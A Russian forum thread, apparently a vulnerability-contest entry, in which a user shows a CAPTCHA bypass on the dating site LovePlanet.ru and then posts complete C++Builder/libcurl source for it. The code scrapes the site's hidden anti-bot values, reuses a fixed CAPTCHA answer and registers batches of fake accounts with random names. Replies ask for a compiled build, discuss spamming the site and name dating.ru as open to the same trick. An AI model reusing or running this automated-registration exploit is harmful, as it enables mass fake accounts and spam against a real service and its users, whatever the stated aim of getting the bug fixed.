Обход капчи loveplanet.ru

CAPTCHA - в настоящее время наиболее распространенный в интернете вид защиты различных сервисов от автоматических регистраций, массовых рассылок и т.д.
В моем видео показана одна из уязвимостей CAPTCHA, позволяющая обойти эту защиту на сайте LovePlanet.ru
LovePlanet.Ru - один из известнейших сайтов знакомств в рунете, начал свою работу в 2005 году. Но как видите, даже на таких крупных сайтах встречаются достаточно серьезные ошибки.

Посмотреть видео на YouTube.com
Скачать архив (RAR, 28.5Mb, пароль 123454321)

В видео показан обход капчи при авторизации, но этим способом можно обойти капчу на любой странице LP
Возможно, в конкурсе уязвимостей это видео будет оффтопом, но мне понравилось

 

мне понравилось)
и музычка в тему.


не плохой старт конкурса=)

 

Хорошое видео!

 

мне нравиться

 

молодец !!!
Но теперь боюсь скоро эту дырку прикроют теперь

 

Видео для того и нужно, чтобы ошибки исправляли, а не чтобы их использовали в своих целях.
Это лишь пример, подобные ошибки есть на многих сервисах.

CamStudio + Video Edit Magic

 

через CamStudio снимал?

 

Выкладывай программу в тему, чтобы мы вместе искоренили этот баг !

 

nupaT, код программы из видео:

PHP:

//---------------------------------------------------------------------------

#include <vcl.h>
#include <curl/curl.h>
#pragma hdrstop

#include "Unit1.h"
//---------------------------------------------------------------------------
#pragma package(smart_init)
#pragma resource "*.dfm"
TForm1 *Form1;

//---------------------------------------------------------------------------
static size_t Writer(char *data, size_t size, size_t nmemb, String *buffer)
{
    size_t result = 0;
    if(buffer != NULL)
    {
        buffer->Insert(data, buffer->Length() + 1);
        result = size * nmemb;
    }
    return result;
}
//---------------------------------------------------------------------------
__fastcall TForm1::TForm1(TComponent* Owner)
    : TForm(Owner)
{
}
//---------------------------------------------------------------------------
void __fastcall TForm1::Button1Click(TObject *Sender)
{
    Randomize();
    
    String     sName, 
            sPage, 
            sRequest, 
            sA,
            sB,
            sC;
    
    String     sSomenums = "16657477591644548381",
            sPic = "7617";

    HINSTANCE libcurl = LoadLibrary( "libcurl.dll" );

    CURL*(__stdcall *curl_easy_init)();
    CURLcode(__stdcall *curl_easy_setopt )(CURL *curl, CURLoption option, ...);
    CURLcode (__stdcall *curl_easy_perform )(CURL *curl);

    curl_easy_init =(CURL*(__stdcall*)())GetProcAddress(libcurl, "curl_easy_init" );
    curl_easy_setopt =(CURLcode(__stdcall *)(CURL *curl, CURLoption option, ...))
                        GetProcAddress(libcurl, "curl_easy_setopt");
    curl_easy_perform =(CURLcode(__stdcall *)(CURL *curl))GetProcAddress(libcurl, "curl_easy_perform" );
            
    CURL *curl = curl_easy_init();
    curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, Writer);
    curl_easy_setopt(curl, CURLOPT_WRITEDATA, &sPage);
    curl_easy_setopt(curl, CURLOPT_USERAGENT, "Opera/9.80 (Windows NT 5.1; U; ru)");
    curl_easy_setopt(curl, CURLOPT_COOKIELIST, "");

    curl_easy_setopt(curl, CURLOPT_URL, "http://loveplanet.ru/a-register/");
    curl_easy_setopt(curl, CURLOPT_REFERER, "http://loveplanet.ru/a-register/");

    
    for(int n = 0; n < 3; ++n)
    {            
        curl_easy_setopt(curl, CURLOPT_COOKIELIST, "ALL");
        
        // получение страницы регистрации
        sPage = "";
        curl_easy_setopt(curl, CURLOPT_POST, 0);
        curl_easy_perform(curl);
            
        // вычисление параметров a_, b_, c_
        sA = sPage;
        sA.Delete(1, sA.Pos("'a_').value = ") + 14 - 1);
        sA.SetLength(sA.Pos(" ") - 1);
        
        sB = sPage;
        sB.Delete(1, sB.Pos("'b_').value = ") + 14 - 1);
        sB.SetLength(sB.Pos(" ") - 1);
        
        sC = sPage;
        sC.Delete(1, sC.Pos("'c_').value = ") + 14 - 1);
        sC.SetLength(sC.Pos(" ") - 1);
        
        sA = IntToStr( sA.ToInt() + sC.ToInt() );
        sB = IntToStr( sB.ToInt() + 2 * (sC.ToInt() + 3) );
        sC = IntToStr( sC.ToInt() - 3 );

        // генерируем имя из символов [a..z]
        sName = "";
        for(int i = 0; i < 6; ++i)
            sName += (char)(Random('z' - 'a') + 'a'); 
        
        sRequest =     "a=register&d=1&a_=" + 
                    sA +
                    "&b_=" +
                    sB +
                    "&c_=" +
                    sC +
                    "&somenums=" +
                    sSomenums +
                    "&login=" + 
                    sName +
                    "&password=" + 
                    sName + 
                    "qwe&password2=" + 
                    sName + 
                    "qwe&email=" +
                    sName + 
                    "%40gmail.com&name=" + 
                    sName +
                    "&bday=01&bmonth=01&byear=1990&bnotify=on&pol=1&orient=1&country=3159&region=4312&city=4400&pic=" +
                    sPic +
                    "&conditions=1";
        sPage = "";
        curl_easy_setopt(curl, CURLOPT_POSTFIELDS, sRequest.c_str());
        curl_easy_setopt(curl, CURLOPT_POST, 1);
        curl_easy_perform(curl);

        Memo1->Lines->Add(sName + ":" + sName + "qwe");
    }
}
//---------------------------------------------------------------------------


 

M_script

А скомпилированный?

 

школота скоро угробит его)

 

Видео на 5+, молодец.

А по теме: спам на лавпланет не реален, я раза два брался) модеры или ИИ, там жесть...

 

На рамблере недавно такая же была . И мыла и аськи можно было регистрировать обходя защиту капчей)

 

Молодец) Видео понравилрсь!

 

молодец )
+

 

Хорошее видео.

 

Отличное начало)
Автор молодец)

 

M_script, Да. Действительно. Давай сконпелированный вариант. Не все используют такую ху...ю вещь как VCL.

//Не в обиду, не люблю борланд.

 

класссс...... мне очень понравилось !

 

Кстати, на многих сайтах знакомств та же система

Например http://dating.ru

http://dating.ru/reg_code.php?rndnum=1062605203